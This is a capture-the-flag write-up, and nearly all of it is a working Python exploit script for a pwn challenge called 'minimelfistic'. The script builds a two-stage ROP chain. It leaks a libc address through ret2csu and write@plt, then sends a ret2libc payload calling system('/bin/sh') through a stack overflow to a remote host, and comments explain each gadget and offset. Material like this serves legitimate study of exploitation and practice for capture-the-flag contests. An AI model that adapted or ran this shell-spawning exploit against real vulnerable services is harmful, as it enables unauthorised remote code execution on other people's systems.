Tags: pwn 

Rating:

### Author: Nima Dabbaghi

-----

```python
#!/usr/bin/env python3
# CTF exploit script for the "minimelfistic" pwn challenge: a two-stage ROP
# chain delivered through a stack buffer overflow.
#   stage 1: ret2csu + write@plt prints write's GOT entry -> libc address leak
#   stage 2: ret2libc, system("/bin/sh") using the leaked libc base
# From a mitigation standpoint the chain relies on fixed (non-PIE) code
# addresses and on the saved return address being directly overwritable at a
# fixed offset (presumably no stack canary) -- confirm both with checksec.

from pwn import *

# Target binary and the libc build shipped with the challenge; the libc copy
# is needed so the leaked address can be turned into a base (libc.address below).
elf = ELF("./minimelfistic", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
#ld = ELF("./ld-2.27.so", checksec=False)

# Derive arch/endianness/word size from the binary; ROP() builds the stage-1
# chain from gadgets found in the binary itself.
context.binary = elf
rop = ROP(elf)

# Print every send/recv -- useful for checking the recvline() skips below.
context.log_level = "debug"

# Remote challenge instance (host/port as given in the writeup).
p = remote("134.209.186.58",30411)

# symbols
# NOTE(review): these three names are never used below -- the chain
# references elf.sym.main / elf.got.write / elf.plt.write directly.
main = elf.sym.main
write_got = elf.got.write
write_plt = elf.plt.write

# gadgets
# Hard-coded absolute addresses in the 0x400000 range, i.e. the binary is
# presumably loaded at a fixed base (no PIE). Only pop_rdi is used below; the
# __libc_csu_init gadgets (pop_csu/mov_csu) are what rop.ret2csu() locates on
# its own, and pop_rsi/ret are left over from manual chain building.
pop_rdi = 0x0000000000400a43
pop_rsi = 0x0000000000400a41
pop_csu = 0x00400a3a # pop rbx, rpb, r12,r13,r14,r15
mov_csu = 0x00400a20 # mov rdx, r15; rsi, r14; edi, r13d
ret = 0x0000000000400616

# Stage 1 chain: write(1, &write@got, 8).
# rdi = 1 (stdout), then ret2csu() loads edi=1, rsi=write's GOT entry, rdx=8
# through the csu gadgets (pwntools' positional order is edi, rsi, rdx, rbx,
# rbp, r12, r13, r14, r15; the trailing 1s are filler for callee-saved regs).
rop.raw(pop_rdi)
rop.raw(p64(1))
rop.ret2csu(1, elf.got.write, 8,1,1,1,1,1,1)
# rdi is popped again before the call; the csu gadget already set edi=1, so
# this is presumably a belt-and-braces step by the author.
rop.raw(pop_rdi)
rop.raw(p64(1))
# write@plt prints the 8-byte GOT entry, i.e. the resolved libc address of
# write; returning to main afterwards allows a second overflow to be sent.
rop.call(elf.plt.write)
rop.call(elf.sym.main)

# 72 bytes of padding up to the saved return address, then the chain. The
# offset is presumably the buffer-to-return-address distance found beforehand
# (not shown on this page).
payload = flat({72:rop.chain()})

# Overflow at the prompt; "9" is presumably the menu choice that makes main
# return and so triggers the chain.
p.sendlineafter(b">", payload)
p.sendlineafter(b">", b"9")
# Skip three lines of program output that precede the leaked bytes.
p.recvline()
p.recvline()
p.recvline()
# A canonical user-space x86-64 address has 6 significant bytes; pad to 8 for u64.
leak = u64(p.recv(6).ljust(8, b"\x00"))
info(f"Leaked libc @ {hex(leak)}")
# Subtract write's offset inside the provided libc to recover the load base.
libc.address = leak - libc.sym.write
success(f"Leaked Libc @ {hex(libc.address)}")

# Second chain; ROP(libc) is used here only as a container for raw() entries.
rop2 = ROP(libc)

# First "/bin/sh" inside libc; absolute because libc.address was set above.
binsh = next(libc.search(b"/bin/sh"))

# Stage 2 chain: pop rdi (binary gadget reused); rdi = "/bin/sh"; return into
# system. The commented-out extra ret is presumably a stack-alignment gadget
# that the author left disabled.
rop2.raw(pop_rdi)
rop2.raw(binsh)
#rop2.raw(pack(0x0000000000400616))
rop2.raw(libc.sym.system)

# Same padding offset as stage 1.
payload2 = flat({72:rop2.chain()})

# Same prompt/menu sequence as before, then hand the connection over to the user.
p.sendlineafter(b">", payload2)
p.sendlineafter(b">", b"9")
p.interactive()
```

Original writeup (https://novasecurity.net/).